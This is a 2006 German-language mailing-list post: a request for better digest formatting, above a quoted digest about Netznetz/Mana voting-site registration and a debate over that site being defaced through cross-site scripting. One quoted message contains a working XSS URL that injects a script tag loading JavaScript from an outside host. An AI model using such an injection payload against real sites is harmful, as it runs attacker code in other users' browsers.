[Metalab] Re: Metalab Digest, Vol 5, Issue 35
yan minagawa
t at twig.de
Tue May 30 02:12:04 CEST 2006
hi
wollt ihr eventuell mal die formatierung dieser zusammenfassungsmail
etwas optimieren?
das ganze ist schoen ziemlich viel META information die ich gar nicht
lesen will.
ausserdem wollte ich fragen ob einer von euch intresse hat ein schickes
formular fuer mailman zu machen? die c-base koennte sowas auch gut
gebrauchen.
t.
On Fri, 2006-03-31 at 12:00 +0200, metalab-request at lists.metalab.at
wrote:
> Send Metalab mailing list submissions to
> metalab at lists.metalab.at
>
> To subscribe or unsubscribe via the World Wide Web, visit
> http://lists.metalab.at/mailman/listinfo/metalab
> or, via email, send a message with subject or body 'help' to
> metalab-request at lists.metalab.at
>
> You can reach the person managing the list at
> metalab-owner at lists.metalab.at
>
> When replying, please edit your Subject line so it is more specific
> than "Re: Contents of Metalab digest..."
>
>
> Today's Topics:
>
> 1. Netznetz-Registrierung: Namensangabe erforderlich
> (Christopher Clay)
> 2. Re: Netznetz-Registrierung: Namensangabe erforderlich
> (Michael Bauer)
> 3. [Metalab-announce] Netznetz-Registrierung: Namensangabe
> erforderlich (Christopher Clay)
> 4. Re: Netznetz-Registrierung: Namensangabe erforderlich
> (Bernd Petrovitsch)
> 5. Re: neues [netznetz.net] -> neue abendunterhaltung, neuer
> hack (Bernd Petrovitsch)
> 6. Re: neues [netznetz.net] -> neue abendunterhaltung, neuer
> hack (Thomas Klausner)
> 7. Re: neues [netznetz.net] -> neue abendunterhaltung, neuer
> hack (Aaron Kaplan)
>
>
> ----------------------------------------------------------------------
>
> Message: 1
> Date: Fri, 31 Mar 2006 08:07:54 +0200
> From: "Christopher Clay" <metalab at c3o.org>
> Subject: [Metalab] Netznetz-Registrierung: Namensangabe erforderlich
> To: "metalab" <metalab at lists.metalab.at>
> Message-ID: <20060331060756.407A01958A0 at plunder.dreamhost.com>
> Content-Type: text/plain; charset="iso-8859-1"
>
> Guten Morgen,
>
> Fr alle, die sich schon bei Netznetz/Mana registriert haben: Bitte
> versichert euch, dass ihr auf
> https://manege.sonance.net/wws/pref/which/
> (Passwort zum Einloggen steht in der Anmeldebesttigungsmail)
> links oben euren vollstndigen, korrekten Namen eingegeben habt
> -- ansonsten ist eure Registrierung dort ungltig!
>
> Auch bitte nicht auf einen Lichtbildausweis vergessen, wenn ihr am
> Montag mitstimmen kommt.
>
> Eine schne bersicht fr alle, die bei Mana noch nicht ganz
> durchblicken (man munkelt, solche solls tatschlich geben),
> findet sich jetzt brigens endlich unter http://mana.manila.at/module
>
> This public service announcement brought to you by
> Christopher
>
> ------------------------------
>
> Message: 2
> Date: Fri, 31 Mar 2006 08:09:53 +0200
> From: Michael Bauer <mihi at lo-res.org>
> Subject: Re: [Metalab] Netznetz-Registrierung: Namensangabe
> erforderlich
> To: Metalab General Discussion List <metalab at lists.metalab.at>
> Message-ID: <20060331060953.GE11102 at tema.lo-res.org>
> Content-Type: text/plain; charset=iso-8859-1
>
> > findet sich jetzt brigens endlich unter http://mana.manila.at/module
>
> Allen denen das zu langweilig ist, lesen
> http://mana.manila.at/discuss/msgReader$11?mode=%22%3E%3Cscript%20src=http://csi.lo-res.org/csi.js%3E%3C/script%3E
>
> public service annoncement brought to you by the cyber space invaders.
> invade with us on http://csi.lo-res.org
>
> :wq!
>
> --
> /usr/bin/perl -e '1==$#ARGV||die "usage: $0 <iPod Volume> <searchstring>";
> open(D,"$ARGV[0]/iPod_Control/iTunes/iTunesDB")||die $!;$_=join "",<D>;
> s/\:/\//g;s/[^\w \.\/]//g;foreach(split /mh(it|sd)/){if(/$ARGV[1]/){
> s/.*mhod.//;system("open \"$ARGV[0]$_\"")}}; # TO COPY IS OUR RIGHT!'
>
>
> ------------------------------
>
> Message: 3
> Date: Fri, 31 Mar 2006 08:05:00 +0200
> From: "Christopher Clay" <metalab at c3o.org>
> Subject: [Metalab] [Metalab-announce] Netznetz-Registrierung:
> Namensangabe erforderlich
> To: "metalab-announce" <metalab-announce at lists.metalab.at>
> Message-ID: <20060331060501.AE0B21960E0 at plunder.dreamhost.com>
> Content-Type: text/plain; charset="iso-8859-1"
>
> Guten Morgen,
>
> Fr alle, die sich schon bei Netznetz/Mana registriert haben: Bitte
> versichert euch, dass ihr auf
> https://manege.sonance.net/wws/pref/which/
> (Passwort zum Einloggen steht in der Anmeldebesttigungsmail)
> links oben euren vollstndigen, korrekten Namen eingegeben habt
> -- ansonsten ist eure Registrierung dort ungltig!
>
> Auch bitte nicht auf einen Lichtbildausweis vergessen, wenn ihr am
> Montag mitstimmen kommt.
>
> Eine schne bersicht fr alle, die bei Mana noch nicht ganz
> durchblicken (man munkelt, solche solls tatschlich geben),
> findet sich jetzt brigens endlich unter http://mana.manila.at/module
>
> This public service announcement brought to you by
> Christopher
> -------------- next part --------------
> _______________________________________________
> Metalab-announce mailing list
> Metalab-announce at lists.metalab.at
> http://lists.metalab.at/mailman/listinfo/metalab-announce
>
> ------------------------------
>
> Message: 4
> Date: Fri, 31 Mar 2006 11:05:05 +0200
> From: Bernd Petrovitsch <bernd at firmix.at>
> Subject: Re: [Metalab] Netznetz-Registrierung: Namensangabe
> erforderlich
> To: Metalab General Discussion List <metalab at lists.metalab.at>
> Message-ID: <1143795905.26518.1.camel at tara.firmix.at>
> Content-Type: text/plain; charset=UTF-8
>
> On Fri, 2006-03-31 at 08:07 +0200, Christopher Clay wrote:
> > Guten Morgen,
> >
> > Fr alle, die sich schon bei Netznetz/Mana registriert haben: Bitte
> > versichert euch, dass ihr auf
> > https://manege.sonance.net/wws/pref/which/
> > (Passwort zum Einloggen steht in der Anmeldebesttigungsmail)
> > links oben euren vollstndigen, korrekten Namen eingegeben habt
> > -- ansonsten ist eure Registrierung dort ungltig!
>
> Was sehr schn klingt, aber leider - zumindest in meinem Fall - nicht
> funktioniert. Einloggen kann ich zwar (mit dem alten) , aber nach der
> Passwortnderung behauptet das Ding, das es nicht funktioniert hat.
>
> Bernd
> --
> Firmix Software GmbH http://www.firmix.at/
> mobil: +43 664 4416156 fax: +43 1 7890849-55
> Embedded Linux Development and Services
>
>
>
> ------------------------------
>
> Message: 5
> Date: Fri, 31 Mar 2006 11:22:54 +0200
> From: Bernd Petrovitsch <bernd at firmix.at>
> Subject: Re: [Metalab] neues [netznetz.net] -> neue
> abendunterhaltung, neuer hack
> To: Metalab General Discussion List <metalab at lists.metalab.at>
> Message-ID: <1143796974.26518.14.camel at tara.firmix.at>
> Content-Type: text/plain; charset=UTF-8
>
> On Thu, 2006-03-30 at 23:30 +0200, Aaron Kaplan wrote:
> [...]
> > Teil #27 unsere taeglichen telenovella "netznetz aka. RAN AN DIE
>
> Telenovelas sind im besten Fall nervig.
>
> > MILLION"...
>
> Mir kommt die ganze Geldverteilungsaktion wie "Junta" vor.
> Analogien zu ziehen is left as a homework for the reader ....
>
> > vorweg, 1) ich finds gut, dass das jetzt auf neue server kommt und 2)
>
> Was offensichtlich nicht impliziert, da es besser wird.
>
> [....]
> > On Mar 30, 2006, at 9:09 PM, Thomas Klausner wrote:
> > > On Thu, Mar 30, 2006 at 05:14:06PM +0200, Aaron Kaplan wrote:
> [...]
> > >> mana.netznetz.net war die GANZE ZEIT wieder gehackt . Naemlich ueber
> > >> ein web formular (XSS attack)
> > >
> > > Nochmal: mana.netznetz.net war nie als 'sichere' Kiste geplant,
> > > sondern
> > > als offene Platform fuer verschiedene beiteiligte developerInnen.
>
> Wenn "offene Platform fuer verschiedene beiteiligte developerInnen"
> impliziert, da die Kiste drunter *inhrent und/oder potentiell*
> unsicher ist, dann sollte man sie besser nicht ans Internet hngen (oder
> sich von entsprechend paranoiden Leuten - entgeltlich oder unentgeltlich
> - das administrieren lassen). Oder es schrammt knapp an "Vorsatz" vorbei
> und landet bei "grober Fahrlssigkeit.
> Und wer immer sich dafr (organisatorisch) zustndig fhlt und/oder ist,
> sollte besser die Finger von Gerten lassen, die komplexer als ein
> Toaster (ohne Internetanbindung und SNMP-Support) sind.
> Ah ja, und Fische beginnen immer am Kopf zu stinken.
>
> Und wieder weg bevor ich den nchsten Rffel krieg,
> Bernd
> --
> Firmix Software GmbH http://www.firmix.at/
> mobil: +43 664 4416156 fax: +43 1 7890849-55
> Embedded Linux Development and Services
>
>
>
> ------------------------------
>
> Message: 6
> Date: Fri, 31 Mar 2006 12:04:41 +0200
> From: Thomas Klausner <domm at cpan.org>
> Subject: Re: [Metalab] neues [netznetz.net] -> neue
> abendunterhaltung, neuer hack
> To: metalab at lists.metalab.at
> Message-ID: <20060331100441.GG4254 at domm2.zsi.at>
> Content-Type: text/plain; charset=us-ascii
>
> Hi!
>
> On Fri, Mar 31, 2006 at 11:22:54AM +0200, Bernd Petrovitsch wrote:
>
> > Wenn "offene Platform fuer verschiedene beiteiligte developerInnen"
> > impliziert, da?? die Kiste drunter *inh??rent und/oder potentiell*
> > unsicher ist, dann sollte man sie besser nicht ans Internet h??ngen (oder
>
> Ein wenig historischer Background:
>
> - Anfang August laedt parasew (5uper.net) mich ein, beim sog.
> SummerSprint mitzumachen, bei dem ein Prototyp fuer ein
> SocialSoftware-Voting-Geldvergabe-Dings entstehen soll
> Ein paar Tage Intensiv-Hacken in Payerbach/Reichenau (mit gratis Essen
> & sogar ein wenig bezahlung (mehr symbolisch) klingt nett, die
> Projektidee auch, ich fahr also hin.
>
> - In Reichenau stellt irgendjemand eine Kiste hin, teilt das root-passwd
> aus (die Kiste haengt NICHT am Internet), und das happy hacking geht
> los.
>
> - bzw zeigen sich bald div. theoretische Probleme (zB das immer noch
> ungeklaerte Person/Projekte/Lables-und-Punkte-Gewichtungs-Problem)
>
> - wir werde nicht mal ansatzweise fertig (u.a. auch wegen einer sehr
> laestigen Darmgrippe, die fast alle Anwesenden ein paar Tage in die
> Knie zwingt)
>
> - zurueck in Wien wird der Server ans Netz gehaengt (steht im uebrigen
> irgendwo im MuQua, relativ leicht zugaegnlich)
>
> - Es war immer geplant, die fertige App entweder bei der Stadt Wien oder
> bei sonst jemand unbeteiligtem (Notar?) zu hosten.
>
> - Im Dezember wird klar, dass die Stadt Wien zu teuer ist.
>
> - Ausserdem wird beim Parliaments of Art das ganze (kaum vorhandene)
> Konzept wieder umgeworfen.
>
> - Stress bricht aus.
>
> ...
>
> und ab dann duerftet ihr es kennen...
>
> Ich persoenlich find die ganze Security-Debatte eher uninteressant. Fuer
> die Sicherheit des Servers zu sorgen ist nicht mein Job. Niemand hatte
> Zeit/Interesse dafuer/daran. Also ist es, wie es ist.
>
> Das mit dem XSS haett ich schon verhindern koennen (war mir auch
> bewusst, dass das geht). Aber wenn man auf ein so bewegliches Ziel wie
> Mana hinentwicklet, hat man definitv andere Sorgen (und ich dachte
> schon, der ORF ist ein komplizierter Kunde...)
>
> (Andererseits haett ich eh nur einen Filter im Input-Parsing aktivieren
> muessen, der das JS raushaut. Hab ich nicht. Sorry.)
>
>
> --
> #!/usr/bin/perl http://domm.zsi.at
> for(ref bless{},just'another'perl'hacker){s-:+-$"-g&&print$_.$/}
>
>
> ------------------------------
>
> Message: 7
> Date: Fri, 31 Mar 2006 11:59:46 +0200
> From: Aaron Kaplan <aaron at lo-res.org>
> Subject: Re: [Metalab] neues [netznetz.net] -> neue
> abendunterhaltung, neuer hack
> To: Metalab General Discussion List <metalab at lists.metalab.at>
> Message-ID: <6343AB97-4FB9-40F5-BA5F-88654E82FBA6 at lo-res.org>
> Content-Type: text/plain; charset=US-ASCII; delsp=yes; format=flowed
>
>
> hi!
>
> mir ist das absolut klar, was domm nochmals geschildert hat.
> Und ich hab glaub ich explizit gesagt: respekt fuer domms arbeit.
> Ich haette das in der kurzen zeit nicht so gut geschafft. Ehrlich.
> Also domm wegen security zu bashen -> wer das tut, haut den falschen.
> Es gibt hier wahrscheinlich auf der liste _niemanden_ der so flott so
> viel sinnvollen perl code zusammenbringt. Obwohl die widersprueche in
> der aufgabenstellung so riesig sind.
>
> Ich poste so dinge eher zur unterhaltung bzw. als kleine vorwarnung,
> dass voting server extrem secure sein sollten.
>
>
> On Mar 31, 2006, at 12:04 PM, Thomas Klausner wrote:
>
> > und ab dann duerftet ihr es kennen...
> >
> > Ich persoenlich find die ganze Security-Debatte eher uninteressant.
> > Fuer
> > die Sicherheit des Servers zu sorgen ist nicht mein Job. Niemand hatte
> > Zeit/Interesse dafuer/daran. Also ist es, wie es ist.
> >
> > Das mit dem XSS haett ich schon verhindern koennen (war mir auch
> > bewusst, dass das geht). Aber wenn man auf ein so bewegliches Ziel wie
> > Mana hinentwicklet, hat man definitv andere Sorgen (und ich dachte
> > schon, der ORF ist ein komplizierter Kunde...)
>
>
>
> ------------------------------
>
> _______________________________________________
> Metalab mailing list
> Metalab at lists.metalab.at
> http://lists.metalab.at/mailman/listinfo/metalab
>
>
> End of Metalab Digest, Vol 5, Issue 35
> **************************************
-------------- next part --------------
A non-text attachment was scrubbed...
Name: smime.p7s
Type: application/x-pkcs7-signature
Size: 1831 bytes
Desc: not available
URL: <http://lists.metalab.at/pipermail/metalab/attachments/20060530/97ee0c93/attachment.bin>
More information about the Metalab
mailing list